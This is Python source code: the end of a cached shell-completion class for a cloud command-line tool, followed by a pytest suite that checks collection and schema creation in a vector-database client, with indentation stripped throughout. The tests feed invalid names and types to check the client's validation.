except Exception: # pylint:disable=broad-except
self.project = 0
self.cache_dir = config.Paths().completion_cache_dir
self.flags = ''
self.index_offset = 0
self.account = properties.VALUES.core.account.Get(required=False)
if self.account:
self.index_offset = 1
self.cache_dir = os.path.join(self.cache_dir, self.account)
def ResourceIsCached(self, resource):
"""Returns True for resources that can be cached.
Args:
resource: The resource as subcommand.resource.
Returns:
True when resource is cacheable.
"""
if resource == 'sql.instances':
return True
if resource.startswith('compute.'):
return True
return False
def GetFromCache(self, self_link, prefix, increment_counters=True):
"""Return a list of names for the specified self_link.
Args:
self_link: A selflink for the desired resource.
prefix: completion word prefix
increment_counters: If True and found in cache, CACHE_TRIES is
incremented.
Returns:
Returns a list of names if in the cache.
"""
options = None
if increment_counters:
RemoteCompletion.CACHE_TRIES += 1
path = RemoteCompletion.CachePath(self_link)[0]
fpath = os.path.join(self.cache_dir, path)
return self._GetAllMatchesFromCache(prefix, fpath, options,
increment_counters)
def _GetAllMatchesFromCache(self, prefix, fpath, options, increment_counters):
"""Return a list of names matching fpath.
Args:
prefix: completion word prefix
fpath: A selflink for the desired resource.
options: list of names in the cache.
increment_counters: If True and found in cache, CACHE_HITS is incremented.
Returns:
Returns a list of names if in the cache.
"""
lst = fpath.split('*')
items = lst[0].split('/')
if len(lst) > 1:
# A resource flag such as --zone or --region is not specified so
# look at all resources with that type
if not os.path.isdir(lst[0]):
return None
index = items.index('completion_cache') + self.index_offset
if index < 0 or index >= len(items):
return options
flagname = _RESOURCE_FLAGS[items[index+2] + '.' + items[-2]]
for name in os.listdir(lst[0]):
self.flags = flagname + name
fpath = lst[0] + name + lst[1]
# make sure that the data in this path is still valid
if os.path.isfile(fpath) and os.path.getmtime(fpath) > time.time():
options = self._GetAllMatchesFromCache(prefix, fpath, options,
increment_counters)
else:
# if not valid then the cache can't be used so return no matches
if os.path.isdir(os.path.dirname(fpath)) and os.path.getsize(fpath):
return None
# for regional resources also check for global resources
lst0 = lst[0]
if lst0.endswith('regions/'):
fpath = lst0[:-len('regions/')] + 'global' + lst[1]
if os.path.isfile(fpath) and os.path.getmtime(fpath) > time.time():
self.flags = ' --global'
options = self._GetAllMatchesFromCache(prefix, fpath, options,
increment_counters)
return options
if not fpath:
return None
try:
# The zone or region is specified so use it if it hasn't timed out
if not os.path.isfile(fpath) or os.path.getmtime(fpath) <= time.time():
return None
with open(fpath, 'r') as f:
data = f.read()
if not options:
options = []
for item in data.split('\n'):
if not prefix or item.startswith(prefix):
options.append(item + self.flags)
self.flags = ''
if increment_counters:
RemoteCompletion.CACHE_HITS += 1
return options
except IOError:
return None
def StoreInCache(self, self_links):
"""Store names of resources listed in cache.
Args:
self_links: A list of resource instance references
Returns:
None
"""
if platforms.OperatingSystem.Current() == platforms.OperatingSystem.WINDOWS:
return None
paths = {}
collection = None
for ref in self_links:
if not collection:
try:
instance_ref = resources.Parse(ref)
collection = instance_ref.Collection()
except resources.InvalidResourceException:
# construct collection from self link
lst = ref.split('/')
collection = lst[3] + '.' + lst[-2]
lst = RemoteCompletion.CachePath(ref)
path = lst[0]
name = lst[1]
if path in paths:
paths[path].append(name)
else:
paths[path] = [name]
if not collection:
return
for path in paths:
abs_path = os.path.join(self.cache_dir, path)
dirname = os.path.dirname(abs_path)
try:
if not os.path.isdir(dirname):
files.MakeDir(dirname)
tempname = tempfile.NamedTemporaryFile(dir=dirname).name
with open(tempname, 'w') as f:
f.write('\n'.join(paths[path]))
        # note that atomic rename doesn't work on windows
os.rename(tempname, abs_path)
now = time.time()
timeout = RemoteCompletion._TIMEOUTS.get(collection, 300)
os.utime(abs_path, (now, now+timeout))
except Exception: # pylint: disable=broad-except
return
def AddToCache(self, self_link, delete=False):
"""Add the specified instance to the cache.
Args:
self_link: A resource selflink.
delete: Delete the resource from the cache
Returns:
None
"""
lst = RemoteCompletion.CachePath(self_link)
path = lst[0]
name = lst[1]
abs_path = os.path.join(self.cache_dir, path)
try:
# save the current modification time on the cache file
mtime = os.path.getmtime(abs_path)
with open(abs_path, 'r') as f:
data = f.read()
options = data.split('\n')
if delete:
options.remove(name)
if not options:
os.remove(abs_path)
return
else:
options.append(name)
with open(abs_path, 'w') as f:
f.write('\n'.join(options))
os.utime(abs_path, (time.time(), mtime))
# restore the current modification time on the cache file
except OSError:
if delete:
return
self.StoreInCache([self_link])
except ValueError:
if delete:
return
def DeleteFromCache(self, self_link):
"""Delete the specified instance from the cache.
Args:
self_link: A resource selflink.
Returns:
None
"""
self.AddToCache(self_link, delete=True)
def UpdateCache(self, operation, uris):
"""Updates the cache using operation on uris.
Args:
operation: AddToCacheOp, DeleteFromCacheOp, or ReplaceCacheOp.
uris: The list of uris for the operation.
Raises:
InternalError: if operation is invalid.
"""
if operation not in (AddToCacheOp, DeleteFromCacheOp, ReplaceCacheOp):
raise exceptions.InternalError(
'RemoteCompletion.UpdateCache operation [{0}] must be an '
'_UpdateCacheOp.'.format(operation))
operation().UpdateCache(self, uris)
@staticmethod
def GetTickerStream():
return os.fdopen(9, 'w')
@staticmethod
def RunListCommand(cli, command, parse_output=False,
list_command_updates_cache=False):
"""Runs a cli list comman with a visual progress tracker/spinner.
Args:
cli: The calliope cli object.
command: The list command that generates the completion data.
parse_output: If True then the output of command is read and split into a
resource data list, one item per line. If False then the command return
value is the resource data list.
list_command_updates_cache: True if running the list command updates the
cache.
Returns:
The resource data list.
"""
pid = os.getpid()
ofile = RemoteCompletion.GetTickerStream()
tracker = CompletionProgressTracker(ofile)
if parse_output:
log_out = log.out
out = StringIO.StringIO()
log.out = out
elif list_command_updates_cache:
command.append('--format=none')
else:
command.append('--format=none[disable]')
with tracker:
items = cli().Execute(command, call_arg_complete=False)
if parse_output:
log.out = log_out
if tracker.has_forked:
# The tracker has forked,
if os.getpid() == pid:
# This is the parent.
return []
# The parent already exited, so exit the child.
      os._exit(0)
if parse_output:
return out.getvalue().rstrip('\n').split('\n')
return list(items)
@staticmethod
def GetCompleterForResource(resource, cli, command_line=None,
list_command_callback_fn=None):
"""Returns a completer function for the given resource.
Args:
resource: The resource as subcommand.resource.
cli: The calliope instance.
command_line: str, The gcloud list command to run.
list_command_callback_fn: function, Callback function to be run to produce
the gcloud list command to run. Takes precedence over command_line.
Returns:
A completer function for the specified resource.
"""
if platforms.OperatingSystem.Current() == platforms.OperatingSystem.WINDOWS:
return None
def RemoteCompleter(parsed_args, **unused_kwargs):
"""Runs list command on resource to generate completion data."""
list_command_updates_cache = False
info = resource_registry.Get(resource)
if info.cache_command:
command = info.cache_command.split(' ')
list_command_updates_cache = True
elif list_command_callback_fn:
command = list_command_callback_fn(parsed_args)
elif command_line:
command = command_line.split('.') + ['list']
else:
command = resource.split('.') + ['list']
if info.bypass_cache:
# Don't cache - use the cache_command results directly.
return RemoteCompletion.RunListCommand(
cli, command, parse_output=True)
options = []
try:
line = os.getenv('COMP_LINE')
prefix = ''
if line:
for i in range(len(line)-1, -1, -1):
c = line[i]
if c == ' ' or c == '\t':
break
prefix = c + prefix
project = properties.VALUES.core.project.Get(required=True)
parms = {}
if command[0] in _OPTIONAL_PARMS:
for arg in _OPTIONAL_PARMS[command[0]]:
for attrib in dict(arg):
if hasattr(parsed_args, attrib):
fun = arg[attrib]
value = fun(parsed_args)
if value:
parms[attrib] = value
command.append('--' + attrib)
command.append(value)
parms['project'] = project
resource_link = resources.Parse('+', parms, resource, resolve=False)
resource_link = resource_link.WeakSelfLink()
lst = resource_link.split('*')
resource_missing = len(lst) > 1
ccache = RemoteCompletion()
options = ccache.GetFromCache(resource_link, prefix)
if options is not None:
return options
items = RemoteCompletion.RunListCommand(
cli, command, list_command_updates_cache=list_command_updates_cache)
if list_command_updates_cache:
options = ccache.GetFromCache(resource_link, prefix) or []
if options:
RemoteCompletion.CACHE_HITS -= 1
return options
# This part can be dropped when all commands are subclassed.
options = []
self_links = []
for item in items:
# Get a selflink for the item
if command[0] == 'compute':
if 'selfLink' in item:
instance_ref = resources.Parse(item['selfLink'])
selflink = instance_ref.SelfLink()
elif resource_link:
selflink = resource_link.rstrip('+') + item['name']
else:
instance_ref = resources.Create(resource, project=item.project,
instance=item.instance)
selflink = instance_ref.SelfLink()
self_links.append(selflink)
lst = selflink.split('/')
name = lst[-1]
if not prefix or name.startswith(prefix):
options.append(name)
if self_links:
ccache.StoreInCache(self_links)
if resource_missing:
options = ccache.GetFromCache(resource_link, prefix,
increment_counters=False) or []
except Exception: # pylint:disable=broad-except
        log.error(resource + ' completion command failed', exc_info=True)
return []
return options
return RemoteCompleter
|
test_collection.py
|
import numpy
import pandas as pd
import pytest
from pymilvus import DataType
from base.client_base import TestcaseBase
from utils.util_log import test_log as log
from common import common_func as cf
from common import common_type as ct
from common.common_type import CaseLabel, CheckTasks
from utils.utils import *
from common import constants as cons
prefix = "collection"
exp_name = "name"
exp_schema = "schema"
exp_num = "num_entities"
exp_primary = "primary"
default_schema = cf.gen_default_collection_schema()
default_binary_schema = cf.gen_default_binary_collection_schema()
uid_count = "collection_count"
tag = "collection_count_tag"
uid_stats = "get_collection_stats"
uid_create = "create_collection"
uid_describe = "describe_collection"
uid_drop = "drop_collection"
uid_has = "has_collection"
uid_list = "list_collections"
uid_load = "load_collection"
field_name = default_float_vec_field_name
default_single_query = {
"bool": {
"must": [
{"vector": {field_name: {"topk": default_top_k, "query": gen_vectors(1, default_dim), "metric_type": "L2",
"params": {"nprobe": 10}}}}
]
}
}
class TestCollectionParams(TestcaseBase):
""" Test case of collection interface """
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_none_removed_invalid_strings(self, request):
if request.param is None:
pytest.skip("None schema is valid")
yield request.param
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_invalid_type_fields(self, request):
if isinstance(request.param, list):
pytest.skip("list is valid fields")
yield request.param
@pytest.fixture(scope="function", params=cf.gen_all_type_fields())
def get_unsupported_primary_field(self, request):
if request.param.dtype == DataType.INT64:
pytest.skip("int64 type is valid primary key")
yield request.param
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_invalid_dim(self, request):
if request.param == 1:
pytest.skip("1 is valid dim")
yield request.param
@pytest.mark.tags(CaseLabel.L0)
def test_collection(self):
"""
target: test collection with default schema
method: create collection with default schema
expected: assert collection property
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
self.collection_wrap.init_collection(c_name, schema=default_schema,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema, exp_num: 0,
exp_primary: ct.default_int64_field_name})
assert c_name in self.utility_wrap.list_collections()[0]
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.xfail(reason="exception not MilvusException")
def test_collection_empty_name(self):
"""
target: test collection with empty name
        method: create collection with an empty name
expected: raise exception
"""
self._connect()
c_name = ""
error = {ct.err_code: 1, ct.err_msg: f'`collection_name` value is illegal'}
self.collection_wrap.init_collection(c_name, schema=default_schema, check_task=CheckTasks.err_res,
check_items=error)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.xfail(reason="exception not MilvusException")
@pytest.mark.parametrize("name", [[], 1, [1, "2", 3], (1,), {1: 1}, None])
def test_collection_illegal_name(self, name):
"""
target: test collection with illegal name
method: create collection with illegal name
expected: raise exception
"""
self._connect()
error = {ct.err_code: 1, ct.err_msg: "`collection_name` value {} is illegal".format(name)}
self.collection_wrap.init_collection(name, schema=default_schema, check_task=CheckTasks.err_res,
check_items=error)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("name", ["12-s", "12 s", "(mn)", "中文", "%$#", "a".join("a" for i in range(256))])
def test_collection_invalid_name(self, name):
"""
target: test collection with invalid name
method: create collection with invalid name
expected: raise exception
"""
self._connect()
error = {ct.err_code: 1, ct.err_msg: "Invalid collection name: {}".format(name)}
self.collection_wrap.init_collection(name, schema=default_schema, check_task=CheckTasks.err_res,
check_items=error)
@pytest.mark.tags(CaseLabel.L0)
def test_collection_dup_name(self):
"""
target: test collection with dup name
        method: create collection with dup name and no schema or data
expected: collection properties consistent
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
self.collection_wrap.init_collection(collection_w.name)
assert collection_w.name == self.collection_wrap.name
assert collection_w.schema == self.collection_wrap.schema
assert collection_w.num_entities == self.collection_wrap.num_entities
assert collection_w.name in self.utility_wrap.list_collections()[0]
@pytest.mark.tags(CaseLabel.L1)
def test_collection_dup_name_with_desc(self):
"""
target: test collection with dup name
method: 1. default schema with desc 2. dup name collection
expected: desc consistent
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
schema = cf.gen_default_collection_schema(description=ct.collection_desc)
collection_w = self.init_collection_wrap(name=c_name, schema=schema,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
self.collection_wrap.init_collection(c_name,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
assert collection_w.description == self.collection_wrap.description
@pytest.mark.tags(CaseLabel.L1)
def test_collection_dup_name_new_schema(self):
"""
target: test collection with dup name and new schema
method: 1.create collection with default schema
2. collection with dup name and new schema
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
self.init_collection_wrap(name=c_name, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
fields = [cf.gen_int64_field(is_primary=True)]
schema = cf.gen_collection_schema(fields=fields)
error = {ct.err_code: 0, ct.err_msg: "The collection already exist, but the schema is not the same as the "
"schema passed in."}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_dup_name_new_primary(self):
"""
target: test collection with dup name and new primary_field schema
method: 1.collection with default schema
2. collection with same fields and new primary_field schema
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
int_field_one = cf.gen_int64_field()
int_field_two = cf.gen_int64_field(name="int2")
fields = [int_field_one, int_field_two, cf.gen_float_vec_field()]
schema = cf.gen_collection_schema(fields, primary_field=int_field_one.name)
collection_w = self.init_collection_wrap(name=c_name, schema=schema,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema,
exp_primary: int_field_one.name})
new_schema = cf.gen_collection_schema(fields, primary_field=int_field_two.name)
error = {ct.err_code: 0, ct.err_msg: "The collection already exist, but the schema is not the same as the "
"schema passed in."}
self.collection_wrap.init_collection(c_name, schema=new_schema, check_task=CheckTasks.err_res,
check_items=error)
assert collection_w.primary_field.name == int_field_one.name
@pytest.mark.tags(CaseLabel.L1)
def test_collection_dup_name_new_dim(self):
"""
target: test collection with dup name and new dim schema
method: 1. default schema 2. schema with new dim
expected: raise exception
"""
self._connect()
new_dim = 120
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
schema = cf.gen_default_collection_schema()
new_fields = cf.gen_float_vec_field(dim=new_dim)
schema.fields[-1] = new_fields
error = {ct.err_code: 0, ct.err_msg: "The collection already exist, but the schema is not the same as the "
"schema passed in."}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
dim = collection_w.schema.fields[-1].params['dim']
assert dim == ct.default_dim
@pytest.mark.tags(CaseLabel.L2)
def test_collection_dup_name_invalid_schema_type(self, get_none_removed_invalid_strings):
"""
target: test collection with dup name and invalid schema
method: 1. default schema 2. invalid schema
        expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
error = {ct.err_code: 0, ct.err_msg: "Schema type must be schema.CollectionSchema"}
schema = get_none_removed_invalid_strings
self.collection_wrap.init_collection(collection_w.name, schema=schema,
check_task=CheckTasks.err_res, check_items=error)
assert collection_w.name == c_name
@pytest.mark.tags(CaseLabel.L1)
def test_collection_dup_name_same_schema(self):
"""
target: test collection with dup name and same schema
method: dup name and same schema
        expected: both collection objects are available
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, schema=default_schema,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
self.collection_wrap.init_collection(name=c_name, schema=default_schema,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
assert collection_w.name == self.collection_wrap.name
@pytest.mark.tags(CaseLabel.L0)
def test_collection_none_schema(self):
"""
target: test collection with none schema
method: create collection with none schema
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
error = {ct.err_code: 0, ct.err_msg: "Should be passed into the schema"}
self.collection_wrap.init_collection(c_name, schema=None, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L0)
def test_collection_invalid_type_schema(self, get_none_removed_invalid_strings):
"""
target: test collection with invalid schema
method: create collection with non-CollectionSchema type schema
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
error = {ct.err_code: 0, ct.err_msg: "Schema type must be schema.CollectionSchema"}
self.collection_wrap.init_collection(c_name, schema=get_none_removed_invalid_strings,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_invalid_type_fields(self, get_invalid_type_fields):
"""
target: test collection with invalid fields type, non-list
method: create collection schema with non-list invalid fields
expected: exception
"""
self._connect()
fields = get_invalid_type_fields
error = {ct.err_code: 0, ct.err_msg: "The fields of schema must be type list"}
self.collection_schema_wrap.init_collection_schema(fields=fields,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_with_unknown_type(self):
"""
target: test collection with unknown type
method: create with DataType.UNKNOWN
expected: raise exception
"""
self._connect()
error = {ct.err_code: 0, ct.err_msg: "Field dtype must be of DataType"}
self.field_schema_wrap.init_field_schema(name="unknown", dtype=DataType.UNKNOWN,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.xfail(reason="exception not MilvusException")
@pytest.mark.parametrize("name", [[], 1, (1,), {1: 1}, "12-s"])
def test_collection_invalid_type_field(self, name):
"""
target: test collection with invalid field name
method: invalid string name
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
field, _ = self.field_schema_wrap.init_field_schema(name=name, dtype=5, is_primary=True)
vec_field = cf.gen_float_vec_field()
schema = cf.gen_collection_schema(fields=[field, vec_field])
error = {ct.err_code: 1, ct.err_msg: "expected one of: bytes, unicode"}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("name", ["12-s", "12 s", "(mn)", "中文", "%$#", "a".join("a" for i in range(256))])
def test_collection_invalid_field_name(self, name):
"""
target: test collection with invalid field name
method: invalid string name
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
field, _ = self.field_schema_wrap.init_field_schema(name=name, dtype=DataType.INT64, is_primary=True)
vec_field = cf.gen_float_vec_field()
schema = cf.gen_collection_schema(fields=[field, vec_field])
error = {ct.err_code: 1, ct.err_msg: "Invalid field name"}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.xfail(reason="exception not MilvusException")
def test_collection_none_field_name(self):
"""
target: test field schema with None name
method: None field name
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
field, _ = self.field_schema_wrap.init_field_schema(name=None, dtype=DataType.INT64, is_primary=True)
schema = cf.gen_collection_schema(fields=[field, cf.gen_float_vec_field()])
error = {ct.err_code: 1, ct.err_msg: "You should specify the name of field"}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("dtype", [6, [[]], {}, (), "", "a"])
def test_collection_invalid_field_type(self, dtype):
"""
target: test collection with invalid field type
method: invalid DataType
expected: raise exception
"""
self._connect()
error = {ct.err_code: 0, ct.err_msg: "Field dtype must be of DataType"}
self.field_schema_wrap.init_field_schema(name="test", dtype=dtype, is_primary=True,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.xfail(reason="exception not MilvusException")
def test_collection_field_dtype_float_value(self):
"""
target: test collection with float type
method: create field with float type
        expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
field, _ = self.field_schema_wrap.init_field_schema(name=ct.default_int64_field_name, dtype=5.0,
is_primary=True)
schema = cf.gen_collection_schema(fields=[field, cf.gen_float_vec_field()])
error = {ct.err_code: 0, ct.err_msg: "Field type must be of DataType!"}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L0)
def test_collection_empty_fields(self):
"""
target: test collection with empty fields
method: create collection with fields = []
expected: exception
"""
self._connect()
error = {ct.err_code: 0, ct.err_msg: "Primary field must in dataframe."}
self.collection_schema_wrap.init_collection_schema(fields=[], primary_field=ct.default_int64_field_name,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_dup_field(self):
"""
target: test collection with dup field name
method: Two FieldSchema have same name
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
field_one = cf.gen_int64_field(is_primary=True)
field_two = cf.gen_int64_field()
schema = cf.gen_collection_schema(fields=[field_one, field_two, cf.gen_float_vec_field()])
error = {ct.err_code: 1, ct.err_msg: "duplicated field name"}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
assert not self.utility_wrap.has_collection(c_name)[0]
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.parametrize("field", [cf.gen_float_vec_field(), cf.gen_binary_vec_field()])
def test_collection_only_vector_field(self, field):
"""
target: test collection just with vec field
method: create with float-vec fields
expected: raise exception
"""
self._connect()
error = {ct.err_code: 0, ct.err_msg: "Primary field must in dataframe"}
self.collection_schema_wrap.init_collection_schema([field], check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_multi_float_vectors(self):
"""
target: test collection with multi float vectors
method: create collection with two float-vec fields
        expected: collection with two float-vec fields is created successfully
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
fields = [cf.gen_int64_field(is_primary=True), cf.gen_float_vec_field(), cf.gen_float_vec_field(name="tmp")]
schema = cf.gen_collection_schema(fields=fields, auto_id=True)
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
@pytest.mark.tags(CaseLabel.L1)
def test_collection_mix_vectors(self):
"""
target: test collection with mix vectors
method: create with float and binary vec
        expected: collection with float and binary vec fields is created successfully
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
fields = [cf.gen_int64_field(is_primary=True), cf.gen_float_vec_field(), cf.gen_binary_vec_field()]
schema = cf.gen_collection_schema(fields=fields, auto_id=True)
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
@pytest.mark.tags(CaseLabel.L0)
def test_collection_without_vectors(self):
"""
target: test collection without vectors
method: create collection only with int field
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
schema = cf.gen_collection_schema([cf.gen_int64_field(is_primary=True)])
error = {ct.err_code: 0, ct.err_msg: "No vector field is found."}
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_without_primary_field(self):
"""
target: test collection without primary field
method: no primary field specified in collection schema and fields
expected: raise exception
"""
self._connect()
int_fields, _ = self.field_schema_wrap.init_field_schema(name=ct.default_int64_field_name, dtype=DataType.INT64)
vec_fields, _ = self.field_schema_wrap.init_field_schema(name=ct.default_float_vec_field_name,
dtype=DataType.FLOAT_VECTOR, dim=ct.default_dim)
error = {ct.err_code: 0, ct.err_msg: "Primary field must in dataframe."}
self.collection_schema_wrap.init_collection_schema([int_fields, vec_fields],
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_is_primary_false(self):
"""
target: test collection with all is_primary false
        method: set is_primary=False on all fields
expected: raise exception
"""
self._connect()
fields = [cf.gen_int64_field(is_primary=False), cf.gen_float_field(is_primary=False),
cf.gen_float_vec_field(is_primary=False)]
error = {ct.err_code: 0, ct.err_msg: "Primary field must in dataframe."}
self.collection_schema_wrap.init_collection_schema(fields, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("is_primary", ct.get_invalid_strs)
def test_collection_invalid_is_primary(self, is_primary):
"""
target: test collection with invalid primary
method: define field with is_primary=non-bool
expected: raise exception
"""
self._connect()
name = cf.gen_unique_str(prefix)
error = {ct.err_code: 0, ct.err_msg: "Param is_primary must be bool type"}
self.field_schema_wrap.init_field_schema(name=name, dtype=DataType.INT64, is_primary=is_primary,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("primary_field", ["12-s", "12 s", "(mn)", "中文", "%$#", "a".join("a" for i in range(256))])
def test_collection_invalid_primary_field(self, primary_field):
"""
target: test collection with invalid primary_field
method: specify invalid string primary_field in collection schema
expected: raise exception
"""
self._connect()
fields = [cf.gen_int64_field(), cf.gen_float_vec_field()]
error = {ct.err_code: 0, ct.err_msg: "Primary field must in dataframe."}
self.collection_schema_wrap.init_collection_schema(fields=fields, primary_field=primary_field,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("primary_field", [[], 1, [1, "2", 3], (1,), {1: 1}, None])
def test_collection_non_string_primary_field(self, primary_field):
"""
target: test collection with non-string primary_field
method: primary_field type is not string
expected: raise exception
"""
self._connect()
fields = [cf.gen_int64_field(), cf.gen_float_vec_field()]
error = {ct.err_code: 0, ct.err_msg: "Primary field must in dataframe."}
self.collection_schema_wrap.init_collection_schema(fields, primary_field=primary_field,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_not_existed_primary_field(self):
"""
target: test collection with not exist primary field
method: specify not existed field as primary_field
expected: raise exception
"""
self._connect()
fake_field = cf.gen_unique_str()
fields = [cf.gen_int64_field(), cf.gen_float_vec_field()]
error = {ct.err_code: 0, ct.err_msg: "Primary field must in dataframe."}
self.collection_schema_wrap.init_collection_schema(fields, primary_field=fake_field,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L0)
def test_collection_primary_in_schema(self):
"""
target: test collection with primary field
method: specify primary field in CollectionSchema
expected: collection.primary_field
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
schema = cf.gen_default_collection_schema(primary_field=ct.default_int64_field_name)
self.collection_wrap.init_collection(c_name, schema=schema)
assert self.collection_wrap.primary_field.name == ct.default_int64_field_name
@pytest.mark.tags(CaseLabel.L0)
def test_collection_primary_in_field(self):
"""
target: test collection with primary field
method: specify primary field in FieldSchema
expected: collection.primary_field
"""
self._connect()
fields = [cf.gen_int64_field(is_primary=True), cf.gen_float_field(), cf.gen_float_vec_field()]
schema, _ = self.collection_schema_wrap.init_collection_schema(fields)
self.collection_wrap.init_collection(cf.gen_unique_str(prefix), schema=schema)
assert self.collection_wrap.primary_field.name == ct.default_int64_field_name
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.xfail(reason="exception not MilvusException")
def test_collection_unsupported_primary_field(self, get_unsupported_primary_field):
"""
target: test collection with unsupported primary field type
method: specify non-int64 as primary field
expected: raise exception
"""
self._connect()
field = get_unsupported_primary_field
vec_field = cf.gen_float_vec_field(name="vec")
error = {ct.err_code: 1, ct.err_msg: "Primary key type must be DataType.INT64."}
self.collection_schema_wrap.init_collection_schema(fields=[field, vec_field], primary_field=field.name,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_multi_primary_fields(self):
"""
target: test collection with multi primary
method: collection with two primary fields
expected: raise exception
"""
self._connect()
int_field_one = cf.gen_int64_field(is_primary=True)
int_field_two = cf.gen_int64_field(name="int2", is_primary=True)
error = {ct.err_code: 0, ct.err_msg: "Primary key field can only be one."}
self.collection_schema_wrap.init_collection_schema(
fields=[int_field_one, int_field_two, cf.gen_float_vec_field()],
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_primary_inconsistent(self):
"""
target: test collection with different primary field setting
method: 1. set A field is_primary 2. set primary_field is B
expected: raise exception
"""
self._connect()
int_field_one = cf.gen_int64_field(is_primary=True)
int_field_two = cf.gen_int64_field(name="int2")
fields = [int_field_one, int_field_two, cf.gen_float_vec_field()]
error = {ct.err_code: 0, ct.err_msg: "Primary key field can only be one"}
self.collection_schema_wrap.init_collection_schema(fields, primary_field=int_field_two.name,
check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_collection_primary_consistent(self):
"""
target: test collection with both collection schema and field schema
method: 1. set A field is_primary 2.set primary_field is A
expected: verify primary field
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
int_field_one = cf.gen_int64_field(is_primary=True)
schema = cf.gen_collection_schema(fields=[int_field_one, cf.gen_float_vec_field()],
primary_field=int_field_one.name)
self.collection_wrap.init_collection(c_name, schema=schema, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: schema})
